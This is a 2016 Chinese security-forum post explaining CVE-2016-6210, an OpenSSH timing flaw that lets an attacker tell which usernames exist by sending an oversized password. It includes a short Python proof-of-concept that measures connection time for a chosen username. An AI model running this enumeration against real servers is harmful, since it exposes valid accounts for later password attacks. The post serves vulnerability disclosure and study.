51破解论坛

 找回密码
 立即注册
搜索
金币/交易币是什么 应聘版主 VIP会员可免积分下载附件
查看: 1642|回复: 0

OpenSSH 爆枚举系统用户(CVE-2016-6210)漏洞

[复制链接]

17

主题

0

好友

126

积分

小学生

Rank: 2

签到天数:3 天

[LV.2]偶尔看看I

热心值
0 点
精华
0
发表于 2016-7-18 16:28:12 |显示全部楼层

该漏洞在opensshd-7.2p2 中被发现,但是安全人员指出,该漏洞应该在更早的版本中已经存在。
漏洞描述如下:
当我们使用ssh客户端去连接服务端的时候,如果向服务端发送一个大于10KB的密码,由于OpenSSH服务端会对user:password的组合,使用加密算法SHA256/SHA512进行加密。

如果我们传输的是一个不存在的用户名,那么就不会进入sha256(user,password)加密流程,如果用户名存在,服务器将会针对这个10KB大的密码进行SHA256的加密,这里就会产生时间差。
  1. Sample code:
  2. ----------------
  3. import paramiko
  4. import time
  5. user=raw_input("user: ")
  6. p='A'*25000
  7. ssh = paramiko.SSHClient()
  8. starttime=time.clock()
  9. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  10. try:
  11.         ssh.connect('127.0.0.1', username=user,
  12.         password=p)
  13. except:
  14.         endtime=time.clock()
  15. total=endtime-starttime
  16. print(total)

  17. (Valid users will result in higher total time).
复制代码
关于该漏洞更多详情,可以在这里查看:

发帖求助前要善用论坛搜索功能,那里可能会有你要找的答案;

如果你在论坛求助问题,并且已经从坛友的回复中解决了问题,请把帖子标题加上【已解决】

如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】【金币】,加分不会扣除自己的积分,做一个热心并受欢迎的人!

贡献值排行榜:
回复

使用道具 举报

fastpost

免责声明

本站中所有被研究的素材与信息全部来源于互联网,版权争议与本站无关。本站所发布的任何软件的逆向分析文章、逆向分析视频、破解补丁、注册机和注册信息,仅限用于学习和研究软件安全的目的。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。学习逆向分析技术是为了更好的完善软件可能存在的不安全因素,提升软件安全意识,所以您如果喜欢某程序,请购买注册正版软件,获得正版优质服务!不得将上述内容私自传播、销售或者其他任何非法用途!否则,一切后果请用户自负!

站长邮箱:service@51pojie.com

QQ|有奖举报|51破解论坛

GMT+8, 2018-9-26 21:27 , Processed in 0.034503 second(s), 45 queries .

您觉得 51破解论坛 还有哪些不足?

© 2001-2016 51破解论坛

回顶部